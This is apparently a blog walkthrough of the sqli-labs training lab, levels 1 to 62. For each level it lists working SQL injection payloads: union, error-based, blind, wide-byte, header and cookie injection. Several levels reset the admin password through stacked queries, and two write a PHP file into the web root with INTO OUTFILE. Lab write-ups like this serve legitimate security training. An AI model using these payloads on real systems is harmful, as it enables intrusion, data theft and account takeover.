
sql-lab walkthrough

2023-08-04 13:57 Author: 笨蛋灬你变了

less-1

?id=1'

Single quote errors, output is echoed, no restrictions

?id=1' and '1'='2 page differs: string type

less-2

?id=1'

Single quote errors, output is echoed, page differs, no restrictions

?id=1 and 1=2 page differs: numeric type

less-3

?id=1'

Single quote errors, output is echoed, page differs, no restrictions

?id=1') and ('1')=('2 page differs: single quote + parenthesis

less-4

?id=1"

Double quote errors, output is echoed, page differs, no restrictions

?id=1") and ("1")=("2 page differs: double quote + parenthesis

less-5

?id=1'

Single quote errors, no echoed output, no restrictions

?id=1' and '1'='2 page differs: string type

No echoed output, so time-based blind injection can be used

?id=1' and sleep(5) --+
?id=1' and if(1=1,sleep(5),1) --+
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1) --+
#ASCII table A-z 65-122   database()=security

Error messages are returned, so double-query (subquery) injection and error-based injection can be used

#double-query injection
select 1,count(*),floor(rand(0)*2) as bd from information_schema.tables group by bd
select 1,count(*),concat((select database()),':',floor(rand(0)*2)) as bd from information_schema.tables group by bd
#error-based injection 1
select 1,2,extractvalue(1,concat(0x7e,database()))
?id=1' union select 1,2,extractvalue(1,concat(0x7e,(select table_schema from information_schema.tables limit 50,1))) --+
#error-based injection 2
select 1,2,updatexml(1,concat(0x7e,database()),1) --+
?id=1' union select 1,2,updatexml(1,concat(0x7e,(select table_schema from information_schema.tables limit 0,1)),1) --+

less-6

?id=1"

Double quote errors, no echoed output, no restrictions

Same as less-5

less-7

?id=1'

Single quote errors, no echoed output, no restrictions; use outfile (write a file)

into outfile()

?id=-1')) union select 1,'<?php phpinfo() ?>',3 into outfile "/var/www/html/Less-7/test.php"--+
#an error is reported, but the file has already been written
#then browse to
/test.php

  1. the directory must be writable

  2. an absolute path is required

less-8

?id=1'

Single quote changes the page, no echoed output, no restrictions

?id=1' and length(database())=8--+
?id=1' and ascii(substr(database(),1,1))=115--+
#database()=security

Brute-force with blind injection

less-9

?id=1

Whatever is appended to id, the page does not react

Try time-based blind injection: single quote

?id=1' and sleep(5)--+
?id=1' and if (ascii(substr(database(),1,1))=115,sleep(5),1)--+

less-10

?id=1

Whatever is appended to id, the page does not react

Try time-based blind injection: double quote

?id=1" and sleep(5)--+
?id=1" and if (ascii(substr(database(),1,1))=115,sleep(5),1)--+

less-11

The page is a submission form: POST request

  1. username:1 password:1 no reaction

  2. username:1' password:1 page errors

  3. username:1' union select 1,2 # password: output echoed, no restrictions

  4. username:1' union select 1,table_schema from information_schema.tables # password: output echoed, no restrictions

less-12

The page is a submission form: POST request

  1. username:1 password:1 no reaction

  2. username:1" password:1 page errors

less-13

The page is a submission form: POST request

  1. username:1 password:1 no reaction

  2. username:1' password:1 page errors; from the error message the closing is inferred to be: ')

  3. username:1')union select 1,2# password:1 page shows a successful login, no echoed output, no restrictions (login succeeds because the union part of the statement yields username=1, password=2)

  4. username:admin')  # password: page shows a successful login, no echoed output, no restrictions (login succeeds because the admin account exists and # comments out the password check)

  5. username:admin') and length(database())=8 # password: boolean-based blind injection

less-14

The page is a submission form: POST request

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:1") password:1

    page errors: inferred to be a double quote

  3. username:admin" # password:1 login succeeds

  4. username:admin" and length(database())=8 # password: boolean-based blind injection

less-15

The page is a submission form: POST request

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:admin' # password:1 login succeeds

  3. username:admin' and length(database())=8 # password: login succeeds, boolean-based blind injection

  4. username:admin' and ascii(substr(database(),1,1))=115# password: login succeeds, boolean-based blind injection

less-16

The page is a submission form: POST request

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:admin") # password:1 login succeeds

  3. username:admin") and length(database())=8 # password: login succeeds, boolean-based blind injection

less-17

The page shows a password reset; Dhakkan: UPDATE user SET password=xxx WHERE username=xxx

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:Dhakkan password:1 password changed successfully

  3. username:Dhakkan' password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  4. username:Dhakkan password:1' password changed successfully, with an error

  5. username:Dhakkan password:1" password changed successfully

  6. username:Dhakkan password:1' and sleep(5)# password changed successfully, with a delay, but not 5 seconds (the UPDATE has a WHERE clause restricting the user to Dhakkan, but the # in the time-based payload comments that WHERE out, so every user's password in the database is changed and the delay is number of users × 5)

  7. username:Dhakkan password: error-based injection

    1' and extractvalue(1,concat(0x7e,database()))#
    1' and updatexml(1,concat(0x7e,database()),1)#
    1' and (select 1,count(*),concat(floor(rand(0)*2),database()) as bd from information_schema.schemata group by bd)# (subquery = double-query injection) -> Operand should contain 1 column(s)
    1' and (select 1 from (select 1,count(*),concat(floor(rand(0)*2),database()) as bd from information_schema.schemata group by bd)bd2)# (subquery in FROM = derived table)
    (SELECT uses union; UPDATE, DELETE and INSERT use or/and)

less-18

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:admin password:0 (correct credentials) login succeeds, echoed output: user agent

  3. capture with Burp and modify: User-Agent: ' login succeeds, with an error

  4. capture with Burp and modify: User-Agent: '' login succeeds (insert into table(1,2,3) values('UA','IP','username'))

  5. capture with Burp and modify: User-Agent: 'and database() and' login succeeds, but database() is output verbatim, not executed (sleep(5) does not work either); try error-based injection

  6. capture with Burp and modify: User-Agent:

    'and extractvalue(1,concat(0x7e,database())) and'
    'and updatexml(1,concat(0x7e,database()),1) and'
    'and (select 1 from(select count(*),concat(database(),floor(rand(0)*2)) as bd from information_schema.schemata group by bd)bd2) and'

less-19

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:admin password:0 (correct credentials) login succeeds, echoed output: referer

  3. capture with Burp and modify: Referer: ' login succeeds, with an error

  4. capture with Burp and modify: Referer: '' login succeeds (insert into table(1,2,3) values('UA','IP','username'))

  5. capture with Burp and modify: Referer: 'and database() and' login succeeds, but database() is output verbatim, not executed (sleep(5) does not work either); try error-based injection

  6. capture with Burp and modify: Referer:

    'and extractvalue(1,concat(0x7e,database())) and'
    'and updatexml(1,concat(0x7e,database()),1) and'
    'and (select 1 from(select count(*),concat(database(),floor(rand(0)*2)) as bd from information_schema.schemata group by bd)bd2) and'

less-20

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:admin password:0 (correct credentials) login succeeds, echoed output: user agent, ip, cookie, login name, password, id

  3. capture both the POST request and the GET request in Burp and add ' to each in turn, until Cookie: uname=admin'; in the GET request errors

  4. modify the cookie: uname=admin followed by

    'and extractvalue(1,concat(0x7e,database()))#
    'and updatexml(1,concat(0x7e,database()),1) #
    'and (select 1 from(select count(*),concat(database(),floor(rand(0)*2)) as bd from information_schema.schemata group by bd)bd2)#

less-21

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:admin password:0 (correct credentials) login succeeds, echoed output: user agent, ip, cookie, login name, password, id

  3. the cookie is found to be YWRtaW4= (base64 of admin); cookie:YWRtaW4= ' (no change); cookie:admin ' (error)

  4. modify the cookie: admin 'and extractvalue(1,concat(0x7e,database()))# errors; the closing is determined to be ')

  5. modify the cookie: admin ')and extractvalue(1,concat(0x7e,database()))# errors

  6. modify the cookie: YWRtaW4gJylhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSkpIw== (step 5, base64-encoded)

    YWRtaW4gJylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSksMSkgIw==

    YWRtaW4gJylhbmQgKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdChkYXRhYmFzZSgpLGZsb29yKHJhbmQoMCkqMikpIGFzIGJkIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGdyb3VwIGJ5IGJkKWJkMikj

less-22

  1. username:1 password:1 login fails, otherwise no reaction, no echoed output, no restrictions

  2. username:admin password:0 (correct credentials) login succeeds, echoed output: user agent, ip, cookie, login name, password, id

  3. the cookie is found to be YWRtaW4= (base64 of admin); cookie:YWRtaW4= ' (no change)

  4. try ' " ') ')) ") ")) \ / in turn to modify the cookie: admin 'and extractvalue(1,concat(0x7e,database()))# and then base64-encode it

  5. admin "and extractvalue(1,concat(0x7e,database()))# succeeds

    YWRtaW4gImFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkj
    YWRtaW4gImFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSwxKSAj
    YWRtaW4gImFuZCAoc2VsZWN0IDEgZnJvbShzZWxlY3QgY291bnQoKiksY29uY2F0KGRhdGFiYXNlKCksZmxvb3IocmFuZCgwKSoyKSkgYXMgYmQgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuc2NoZW1hdGEgZ3JvdXAgYnkgYmQpYmQyKSM=

less-23

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' single quote errors

  3. ?id=1' and '1'='1 displays normally; ?id=1' and '1'='2 no echoed output, showing single-quote wrapping, string type, no character filtering

  4. build on the error output and ?id=1' and '1'='1:

    ?id=1' and length(database())= '1 no echoed output
    ?id=1' and length(database())= '8 output echoed, use boolean-based blind injection
    ?id=1' and length((select table_name from information_schema.tables where table_schema= 'security' limit 0,1))= '1
    ?id=1' and length((select table_name from information_schema.tables where table_schema= 'security' limit 0,1))= '6 output echoed

less-24

The page has a login and new-user registration; after logging in the password can be changed

  1. capture each page and test the parameters with ': no effect

  2. when registering a new user, special characters are not filtered and are written into the database as-is, so try second-order injection

  3. create the user: admin'#/1

  4. change the new user's password: admin'#/2

  5. now the database executes the special characters '#, and what gets changed is admin's password, i.e. admin/2 while admin'#/1 stays
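As an added example (not code from the original post or from sqli-labs), the second-order injection of less-24 reduced to a toy password-change handler: the stored username is spliced into the UPDATE in the vulnerable version and bound as a parameter in the fixed one. It uses SQLite in memory, so the MySQL `#` comment from the payload is replaced by SQLite's `--`; the schema and users are constructed for the demo.

```python
import sqlite3

# Constructed toy schema for this example; not sqli-labs' real table layout.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'secret')")
    return db

def register(db, username, password):
    # Registration is parameterized (less-24 escapes quotes instead), so a name such
    # as admin'-- is stored verbatim with its quote intact: the payload is now data at rest.
    db.execute("INSERT INTO users VALUES (?, ?)", (username, password))
    db.commit()

def change_password_vulnerable(db, username, new_password):
    # Second-order bug: the username read back from the session/database is trusted
    # and spliced into the statement. With username admin'-- the WHERE clause becomes
    #   WHERE username='admin'--'
    # so the comment swallows the closing quote and admin's row is updated.
    sql = (f"UPDATE users SET password='{new_password}' "
           f"WHERE username='{username}'")
    db.execute(sql)
    db.commit()
    return sql

def change_password_fixed(db, username, new_password):
    # Fix: bind both values; the quote inside the stored name can no longer end the literal.
    db.execute("UPDATE users SET password=? WHERE username=?", (new_password, username))
    db.commit()

def password_of(db, username):
    row = db.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None

def demo(handler):
    """Register admin'-- , change its password through `handler`, return both passwords."""
    db = make_db()
    register(db, "admin'--", "1")
    handler(db, "admin'--", "2")
    return password_of(db, "admin"), password_of(db, "admin'--")

if __name__ == "__main__":
    print("vulnerable:", demo(change_password_vulnerable))  # admin's password changed
    print("fixed:     ", demo(change_password_fixed))       # only admin'-- changed
```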

less-25

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' single quote errors

  3. ?id=1' and '1'='1 shows that and and or are filtered

  4. ?id=1' && '1'='1 the && '1'='1 part is not executed

  5. ?id=1' ||  '1'='1 (or) and ?id=1' ||  '1'='2 execute, but 1' decides whether the expression holds, so it is always true; ?id= -1' ||  '1'='1 shows login info; ?id= -1' ||  '1'='2 no echoed output

  6. ?id=-1' || length(database())= '1 no echoed output; ?id=-1' || length(database())= '8 output echoed, use boolean-based blind injection

less-26

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' single quote errors

  3. ?id=-1' || length(database())= '1 the - in -1' is filtered, and spaces are filtered

  4. ?id=0' || length(database())= '1 no echoed output; ?id=0' || length(database())= '8 output echoed, use boolean-based blind injection

  5. bypassing the space filter

    ?id=0'/**/||/**/length((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema= "security"/**/limit/**/0,1))='6
    # /**/ and \ are filtered (/**/, \t, () and %a0 can replace a space)
    ?id=0'|| length((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security")))='6
    ?id=0'|| length((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security")))='29
    succeeds
    # try error-based injection
    ?id=0'||(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())))))||'1'='1
    ?id=0'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))),1))||'1'='1
    succeeds

less-27

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' single quote errors

  3. ?id=0' || length(database())= '1 no echoed output; ?id=0' || length(database())= '8 output echoed, use boolean-based blind injection

  4. ?id=0'|| length((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema="security")))='6 union and select are filtered; try case variation and keyword doubling to bypass

  5. ?id=0'|| length((SSELECTELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")))='6

    ?id=0'|| length((SSELECTELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")))='29 succeeds
    ?id=0'||(extractvalue(1,concat(0x7e,(SSELECTELECT(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))))||'1'='1
    ?id=0'||(updatexml(1,concat(0x7e,(SSELECTELECT(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))||'1'='1

less-28

  1. ?id=0' || length(database())= '1 no echoed output; ?id=0' || length(database())= '8 login info echoed, use boolean-based blind injection

  2. ?id=0'|| length((SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")))='6

    ?id=0'|| length((SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")))='29

  3. ?id=0'|| ascii(substr((SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),1,1))='29 no echoed output

    ?id=0'|| ascii(substr((SELECT(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),1,1))='101 login info echoed (e)

less-29

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' single quote errors

  3. ?id=1' and '1'='1 login info echoed; ?id=1' and '1'='2 no echoed output

  4. ?id=0' || length(database())= '1 no echoed output; ?id=0' || length(database())= '8 output echoed, use boolean-based blind injection

  5. ?id=0' || length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= '6 output echoed

less-30

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1', ), '), )) all echo login info; ?id=1" no echoed output: guess " closing

  3. ?id=1" and "1"="1 login info echoed; ?id=1" and "1"="2 no echoed output

  4. ?id=0" || length(database())= "1 no echoed output; ?id=0" || length(database())= "8 output echoed, use boolean-based blind injection

  5. ?id=0" || length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= "6 (emails) login info echoed

less-31

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1" errors; ?id=1") closes

  3. ?id=1") and ("1")=("1 login info echoed; ?id=1") and ("1")=("2 no echoed output

  4. ?id=1") and length(database())=("1 no echoed output; ?id=1") and length(database())=("8 output echoed, use boolean-based blind injection

  5. ?id=1") and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= ("6 (emails) login info echoed

less-32

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' page shows 1\'

  3. input is escaped; try wide-byte injection: ?id=1%df' errors

  4. ?id=1%df' and length(database())=1--+ no echoed output; ?id=1%df' and length(database())=8--+ output echoed, use boolean-based blind injection

  5. ?id=1%df' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6--+ login info echoed

less-33 (same as 32)

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' page shows 1\'

  3. input is escaped; try wide-byte injection: ?id=1%df' errors

  4. ?id=1%df' and length(database())=1--+ no echoed output; ?id=1%df' and length(database())=8--+ output echoed, use boolean-based blind injection

  5. ?id=1%df' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6--+ login info echoed

less-34

  1. username:admin password:0

  2. username:admin' password:0 shows: admin\'

  3. input is escaped; try wide-byte injection: username:admin%df' password:0 shows: admin%df\'

  4. errors

    • username:admin�' password:

    • enter admin%df' in the Burp capture

  5. username:admin�' and length(database())=1# password: and username:admin�' and length(database())=8# password: no echoed output

  6. username:admin�' or length(database())=1# password: no echoed output; username:admin�' or length(database())=8# password: login info echoed

  7. username:admin�' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6# password: login info echoed

less-35

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' page shows 1\' with an error

  3. input is escaped; try wide-byte injection: ?id=1%df' shows: 1�\' with an error

  4. ?id=1 and 1=1 login info echoed; ?id=1 and 1=2 no echoed output

  5. ?id=1 and length(database())=1 no echoed output; ?id=1 and length(database())=8 login info echoed

  6. ?id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6 login info echoed

less-36

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' page shows 1\' and echoes login info

  3. input is escaped; try wide-byte injection: ?id=1%df' shows: 1�\' with an error

  4. ?id=2%df' and 1=1--+ login info echoed; ?id=2%df' and 1=2--+ no echoed output

  5. ?id=2%df' and length(database())=1--+ no echoed output; ?id=2%df' and length(database())=8--+ login info echoed

  6. ?id=2%df' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6--+ login info echoed

less-37 (same as 34)

  1. username:admin password:0

  2. username:admin' password:0 shows: admin\'

  3. input is escaped; try wide-byte injection: username:admin%df' password:0 shows: admin%df\'

  4. errors

    • username:admin�' password:

    • enter admin%df' in the Burp capture

  5. username:admin�' and length(database())=1# password: and username:admin�' and length(database())=8# password: no echoed output

  6. username:admin�' or length(database())=1# password: no echoed output; username:admin�' or length(database())=8# password: login info echoed

  7. username:admin�' or length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6# password: login info echoed

less-38

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' errors

  3. ?id=1' and '1'='1 login info echoed; ?id=1' and '1'='2 no echoed output

  4. ?id=1' and length(database())=1--+ no echoed output; ?id=1' and length(database())=8--+ login info echoed

  5. ?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6--+ login info echoed

less-39

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1' errors

  3. ?id=1 and 1=1 login info echoed; ?id=1 and 1=2 no echoed output

  4. ?id=1 and length(database())=1 no echoed output; ?id=1 and length(database())=8 login info echoed

  5. ?id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6 login info echoed

less-40

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1", ), '), )) all echo login info; ?id=1' no echoed output: guess ' closing

  3. ?id=1' and '1'='1 login info echoed; ?id=1' and '1'='2 no echoed output

  4. ?id=1' and length(database())= '1 no echoed output; ?id=1' and length(database())= '8 output echoed, use boolean-based blind injection

  5. ?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))='6 (emails) login info echoed

less-41

  1. ?id=1 page shows: login name:dumb password:0

  2. ?id=1', ", ), '), "), )) no echoed output

  3. ?id=1 and 1=1 login info echoed; ?id=1 and 1=2 no echoed output

  4. ?id=1 and length(database())=1 no echoed output; ?id=1 and length(database())=8 login info echoed

  5. ?id=1 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6 login info echoed

less-42

The page has a login; after logging in the password can be changed

  1. capture each page and test the parameters with ': no effect

  2. no way forward; the title of level 42 is: stacked query

  3. stacked injection: username:admin password:0';update users set password='1' where  username='admin'# (the users table name is known in advance here; this only verifies that stacked injection exists; a table could also be created with create)

  4. verify: username:admin password:1 login succeeds

less-43

  1. the title is stacked query

  2. stacked injection: username:admin password:1';update users set password='2' where  username='admin'# errors: ') closing

  3. username:admin password:1');update users set password='2' where  username='admin'#

  4. verify: username:admin password:2 login succeeds

less-44

  1. the title is stacked query

  2. stacked injection: username:admin password:2';update users set password='3' where  username='admin'#

  3. verify: username:admin password:3 login succeeds

less-45

  1. the title is stacked query

  2. stacked injection: username:admin password:3';update users set password='4' where  username='admin'# login fails

  3. username:admin password:3');update users set password='4' where  username='admin'# guessed blindly: try ', ", ), '), "), )) one by one

  4. verify: username:admin password:4 login succeeds

less-46

  1. ?sort=1 page shows the user list

  2. ?sort=1' errors

  3. ?sort=4 page shows: Unknown column '4' in 'order clause'; inferred: select * from security.users order by 1

  4. ?sort=1 desc page sorts descending, showing that this spot is injectable

  5. ?sort=1 and sleep(1)--+ 18 seconds: exactly 18 rows, 1 second each

  6. time-based blind injection:

    ?sort=1 and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+ database name
    ?sort=1 and if (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6,sleep(1),1)--+ table name length

  7. error-based injection:

    ?sort=1 and extractvalue(1,concat(0x7e,database()))--+
    ?sort=1 and updatexml(1,concat(0x7e,database()),1)--+
    ?sort=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2)) as bd from information_schema.schemata group by bd)bd2)--+ (derived table)

  8. one-line webshell: ?sort=1 and (select '<?php phpinfo() ?>') into outfile 'var/www/html/Less-46/test.php' --+ page shows: Can't create/write to file '/var/lib/mysql/var/www/html/Less-46/test.php' (Errcode: 2)

  9. ?sort=1 and (select '<?php phpinfo() ?>') into outfile "/var/www/html/Less-46/test.php" --+ file written successfully, but its content has no phpinfo()

  10. ?sort=1 and (select '<?php phpinfo() ?>') into outfile "/var/www/html/Less-46/test.php" lines terminated by 0x3c3f70687020706870696e666f2829203f3e written successfully; every line ends with <?php phpinfo() ?> (lines terminated by 0x3c3f70687020706870696e666f2829203f3e: each line ends with that hex string)

  11. http://xxxxxxxxx/Less-46/test.php visit the phpinfo file

less-47

  1. ?sort=1 page shows the user list

  2. ?sort=1' errors

  3. ?sort=1", ), 2, 3, 4, 5, 6, dfsd all show the user list

  4. ?sort=1' and sleep(1)--+ same as 46, but with a single quote ' added after ?sort=1

less-48

  1. ?sort=1 page shows the user list

  2. ?sort=1', ", ), 2, 3, 4, 5, 6, dfsd no echoed output

  3. ?sort=1, 2, 3 page shows different orderings

  4. blind injection directly: ?sort=1 and sleep(1)--+ ; ?sort=1 and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+

less-49

  1. ?sort=1 page shows the user list

  2. ?sort=1' no echoed output

  3. ?sort=1", ), 2, 3, 4, 5, 6, dfsd all show the user list

  4. ?sort=1' and sleep(1)--+ same as 47; ?sort=1' and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+

less-50

  1. ?sort=1 page shows the user list

  2. ?sort=1' errors

  3. ?sort=1, 2, 3 page shows different orderings

  4. ?sort=4 page shows: Unknown column '4' in 'order clause'; inferred: select * from security.users order by 1

  5. ?sort=1 desc page sorts descending, showing that this spot is injectable

  6. error-based injection:

    ?sort=1 and extractvalue(1,concat(0x7e,database()))--+
    ?sort=1 and updatexml(1,concat(0x7e,database()),1)--+
    ?sort=1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2)) as bd from information_schema.schemata group by bd)bd2)--+ (derived table)

  7. time-based blind injection:

    ?sort=1 and sleep(1)--+
    ?sort=1 and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+ database name
    ?sort=1 and if (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6,sleep(1),1)--+ table name length

less-51

  1. ?sort=1 page shows the user list

  2. ?sort=1' errors

  3. ?sort=1", ), 2, 3, 4, 5, 6, dfsd all show the user list

  4. error-based injection:

    ?sort=1' and updatexml(1,concat(0x7e,database()),1)--+
    ?sort=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2)) as bd from information_schema.schemata group by bd)bd2)--+ (derived table)

  5. time-based blind injection:

    ?sort=1' and sleep(1)--+
    ?sort=1' and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+ database name
    ?sort=1' and if (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6,sleep(1),1)--+ table name length

less-52

  1. ?sort=1 page shows the user list

  2. ?sort=1', ", ), 2, 3, 4, 5, 6, dfsd no echoed output

  3. blind injection directly: ?sort=1 and sleep(1)--+ ; ?sort=1 and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+

less-53

  1. ?sort=1 page shows the user list

  2. ?sort=1' no echoed output

  3. ?sort=1", ), 2, 3, 4, 5, 6, dfsd all show the user list

  4. time-based blind injection:

    ?sort=1' and sleep(1)--+
    ?sort=1' and if (ascii(substr(database(),1,1))=115,sleep(1),1)--+ database name
    ?sort=1' and if (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))= 6,sleep(1),1)--+ table name length

less-54

  1. ?id=1 (the database is: challenges)

  2. ?id=1' no echoed output

  3. ?id=-1' union select 1,2,3--+

  4. ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ shows: G84L30CHOC

  5. ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='G84L30CHOC'--+ shows: id,sessid,secret_1A6W,tryy

  6. ?id=-1' union select 1,2,secret_1A6W from challenges.G84L30CHOC--+ shows: WJBEHUHFoXEHjhKq4Wnurbdv

less-55

  1. ?id=1 and 1=1 ; ?id=1 and 1=2 page changes: shows login info

  2. ?id=1) and (1)=(1 ; ?id=1) and (1)=(2 page changes: shows login info

  3. ?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ shows: ZJSHM2DQ8C

  4. ?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ZJSHM2DQ8C'--+ shows: id,sessid,secret_F863,tryy

  5. ?id=-1) union select 1,2,secret_F863 from challenges.ZJSHM2DQ8C--+ shows: L40AihaqkVCdlw65coL81gv8

less-56

  1. ?id=1')

  2. ?id=1') and ('1')=('1 ; ?id=1') and ('1')=('2 page changes: shows login info

  3. ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ shows: KX05DRNQNP

  4. ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='KX05DRNQNP'--+ shows: id,sessid,secret_KSM0,tryy

  5. ?id=-1') union select 1,2,secret_KSM0 from challenges.KX05DRNQNP--+ shows: 6xPDGoV2DVCaMzWGbnuKf0p2

less-57

  1. ?id=1"

  2. ?id=1" and "1"="1 ; ?id=1" and "1"="2 page changes: shows login info

  3. ?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+ shows: RJSIGBQM4G

  4. ?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='RJSIGBQM4G'--+ shows: id,sessid,secret_6FSL,tryy

  5. ?id=-1" union select 1,2,secret_6FSL from challenges.RJSIGBQM4G--+ shows: PkL01Ui2JbuHfxG9XkR3yc6Q

less-58

  1. ?id=1

  2. ?id=1' errors

  3. error-based injection: ?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+ shows: JBIP1R5EMM

  4. ?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='JBIP1R5EMM')),1)--+ shows: id,sessid,secret_0B7B,tryy

  5. ?id=1' and updatexml(1,concat(0x7e,( select secret_0B7B from challenges.JBIP1R5EMM)),1)--+ shows: 9JwkTrU87NHBBP1JbHLqi6Ja

less-59

  1. ?id=1

  2. ?id=1 and 1=1 ; ?id=1 and 1=2 page output differs

  3. error-based injection: ?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+ shows: 9KYV46AU0T

  4. ?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='9KYV46AU0T')),1)--+ shows: id,sessid,secret_W9RR,tryy

  5. ?id=1 and updatexml(1,concat(0x7e,( select secret_W9RR from challenges.9KYV46AU0T)),1)--+ shows: A8Kp6YmTsMFaGouiQuz7Vp0W

less-60

  1. ?id=1" errors

  2. error-based injection: ?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+ shows: PJQAGLUUXF

  3. ?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='PJQAGLUUXF')),1)--+ shows: id,sessid,secret_8GNJ,tryy

  4. ?id=1") and updatexml(1,concat(0x7e,( select secret_8GNJ from challenges.PJQAGLUUXF)),1)--+ shows: FP4sSmvc9iLmGtNA7pRZqcsQ

less-61

  1. ?id=1' errors

  2. error-based injection: ?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+ shows: 1PA6G0TRVN

  3. ?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='1PA6G0TRVN')),1)--+ shows: id,sessid,secret_LVJI,tryy

  4. ?id=1')) and updatexml(1,concat(0x7e,( select secret_LVJI from challenges.1PA6G0TRVN)),1)--+ shows: jEtrVlDZGr0Rcq1E1nd3gpmE

less-62

  1. only the single quote gives no echoed output

  2. ?id=1') and ('1')=('1 ; ?id=1') and ('1')=('2 page output differs

